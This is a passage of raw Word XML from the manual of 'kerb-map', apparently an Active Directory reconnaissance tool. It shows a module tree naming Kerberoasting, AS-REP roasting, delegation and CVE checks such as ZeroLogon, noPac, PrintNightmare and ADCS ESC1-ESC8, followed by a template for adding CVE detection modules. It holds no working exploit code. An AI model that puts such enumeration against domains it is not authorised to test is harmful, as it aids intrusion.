      <w:tr w:rsidR="00707BE4" w14:paraId="2DE6ABEB"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DFAE9C3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   └── ldap_client.py            # LDAP auth &amp; query layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="053949A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55E1431" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── modules/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="79B330D1"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1CB922B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── spn_scanner.py            # Kerberoastable accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="364496FE"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A64C0C8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── asrep_scanner.py          # AS-REP Roastable accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="32152708"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0615C0E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── delegation_mapper.py      # All three delegation types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0A5389E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0871C3F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── user_enumerator.py        # Users, policy, trusts, LAPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0D36DACC"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1DE6E36" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── scorer.py                 # Cross-correlation &amp; ranking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6BA0C13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C747B09" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── cve_scanner.py            # CVE orchestrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="42392AE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121369F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   └── cves/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="3B9B427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630DD01" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │       ├── cve_base.py             # Abstract base + CVEResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="24D7308B"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E516D34" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │       ├── zerologon.py            # CVE-2020-1472</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="108346F2"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E6E175D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │       ├── nopac.py                # CVE-2021-42278/42287</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5C32C04B"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74564A5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │       ├── printnightmare.py       # CVE-2021-1675/34527 + PetitPotam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="222F3487"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207D97C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │       ├── adcs.py                 # ESC1-ESC8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5909A58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7FEE7A7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │       └── ms14_068.py             # CVE-2014-6324</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="744E996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21FAD77" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── output/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="02EA39D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65EEE57" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── logger.py                 # Rich-powered logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="51D9638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EB932A9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   ├── reporter.py               # Terminal tables &amp; summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7933A55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BCBEC44" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    │   └── exporter.py               # JSON + BloodHound export</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="3DEBD18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D5B2D75" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    └── db/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7D4D0C9A"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AD1CA5D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        └── cache.py                  # SQLite scan history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FE96057" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0721AEC5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A61C8" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc224561340"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>12.  Extending kerb-map</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="04C60190" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc224561341"/>
      <w:r>
        <w:t>12.1  Adding a New CVE Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="3B36A4DD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>All CVE modules inherit from CVEBase and return a CVEResult dataclass. Adding a new CVE check requires three steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F8AED" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Create a new file in kerb_map/modules/cves/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E617B5D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Inherit from CVEBase, implement the check() method, return a CVEResult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC693BF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Import and add to either _safe or _loud list in cve_scanner.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EF50E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABFEDD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Minimal example: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07BE4" w14:paraId="0DE86EF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85D49E3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>from kerb_map.modules.cves.cve_base import CVEBase, CVEResult, Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="22B5A21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8F6E4D6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="65C500F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2D16FBC2" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>class MyCVE(CVEBase):</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="185F32F6"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1C1F19F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    CVE_ID = 'CVE-XXXX-XXXX'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="11B510F2"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1732C4D0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    NAME   = 'My CVE Name'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="42D14CC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A57BBEC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="0C7A5189"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27BA51E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    def check(self) -&gt; CVEResult:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6BE9DFC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B969BF5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        vulnerable = self._my_detection_logic()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="06995BA8"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063A5346" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        return CVEResult(</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="61F98890"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445DEA7D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            cve_id=self.CVE_ID, name=self.NAME,</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="324D7B8E"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CF8DD45" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            severity=Severity.HIGH, vulnerable=vulnerable,</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7DCEA59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189C81B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            reason='Found because...',</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6073AF5F"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7BB4C197" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            evidence={'key': 'value'},</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2E50A6F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511BB08B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            remediation='Apply patch XYZ.',</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="11D1EDD4"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6721AC0A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            next_step='exploit_cmd.py ...' if vulnerable else '',</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5FDAEC57" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E2A38"/>
            <w:tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D9D8A99" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CA9C0DC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758B068" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc224561342"/>
      <w:r>
        <w:t>12.2  Adding a New Enumeration Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="3074629E" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Create a new .py file in kerb_map/modules/. The module receives an LDAPClient instance and should expose a single primary method (e.g. scan() or enumerate()) that returns a list or dict. Import it in kerb-map.py and plug it into the scan flow and the scorer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF82342" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796D8F56" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc224561343"/>
      <w:r>
        <w:t>12.3  Customising the Scorer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="7B20D9E3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The scorer in kerb_map/modules/scorer.py is straightforward to extend. Each finding type is a dictionary appended to the targets list with keys: target, attack, priority (0-100), severity, reason, next_step, category. Add additional finding types by inserting a new block in the rank() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3653DF36" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6FD4C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03502EEB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc224561344"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>13.  Legal Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="3624ACD6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60"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9"/>
        <w:gridCol w:w="7891"/>
      </w:tblGrid>
      <w:tr w:rsidR="00707BE4" w14:paraId="548D8094" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="380761D1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
